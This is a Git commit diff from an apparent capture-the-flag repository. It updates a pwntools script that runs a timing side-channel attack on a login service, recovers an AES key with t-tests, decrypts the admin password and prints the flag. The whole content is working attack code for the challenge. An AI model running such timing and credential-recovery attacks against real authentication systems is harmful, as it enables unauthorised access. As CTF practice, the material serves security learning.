ctf/open_pit
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

The automated attack now goes all the way of fetching the flag

Browse Source
This commit is contained in:
Manuel Vögele
2019-07-02 19:13:17 +02:00
parent 28fe1a971f
commit de80694af5
1 changed files with 20 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
break_script/automated_attack.py
View File

@@ -6,6 +6,8 @@ import string
import math import math
import threading import threading
from Crypto.Cipher import AES
#context.log_level = "debug" #context.log_level = "debug"
allowed_chars = string.ascii_letters + string.digits + string.punctuation allowed_chars = string.ascii_letters + string.digits + string.punctuation
@@ -51,7 +53,7 @@ def gather_measurements_(r, amount, total_amount, measurements, progress, lock):
r.recvuntil(b"> ") r.recvuntil(b"> ")
password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii") password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii")
r.send(b"login\n") r.send(b"login\n")
r.send(password) r.send("admin")
r.send(b"\n") r.send(b"\n")
r.send(password) r.send(password)
r.send(b"\n") r.send(b"\n")
@@ -87,11 +89,11 @@ def t_test(group_big, group_small):
variance_small = variance(group_small, mean_small) variance_small = variance(group_small, mean_small)
return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small)) return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small))
#remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/default/secutech")] remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/meson.debug.linux.x86_64/secutech", cwd="/home/manuel/wolke/Projects/secutech_authenticator")]
remotes = [] #remotes = []
no_threads = 50 #no_threads = 50
for i in range(no_threads): #for i in range(no_threads):
remotes.append(remote("ccn.li", "5555")) # remotes.append(remote("ccn.li", "5555"))
for r in remotes: for r in remotes:
r.recvuntil(b"> ") r.recvuntil(b"> ")
@@ -134,7 +136,7 @@ while len(key) < 16:
# The biggest value in the list is our best guess for the value # The biggest value in the list is our best guess for the value
max_t_value = max(t_values) max_t_value = max(t_values)
candidate = t_values.index(max_t_value) candidate = t_values.index(max_t_value)
progress.success("{:02X} ({:.2})".format(candidate, max_t_value)) progress.success("{:02X} ({:})".format(candidate, max_t_value))
# Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements # Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements
if max_t_value >= 4.5: if max_t_value >= 4.5:
@@ -142,7 +144,18 @@ while len(key) < 16:
else: else:
break break
encrypted_adminpw = bytes([0xe3, 0x07, 0x2e, 0x9f, 0x5b, 0xe8, 0xed, 0xd6, 0x02, 0xab, 0x89, 0xb8, 0xeb, 0x49, 0xcc, 0x56])
aes = AES.new(bytes(key), AES.MODE_ECB)
adminpw = aes.decrypt(encrypted_adminpw)
remotes[0].send("login\nadmin\n")
remotes[0].send(adminpw)
remotes[0].send("\n")
remotes[0].recvuntil("Password: ")
flag = remotes[0].recvuntil("\n")
for r in remotes: for r in remotes:
r.close() r.close()
print("Key:", " ".join(["{:02X}".format(k) for k in key])) print("Key:", " ".join(["{:02X}".format(k) for k in key]))
print("Adminpw:", adminpw.decode("ascii"))
print("Flag:", flag.decode("ascii"))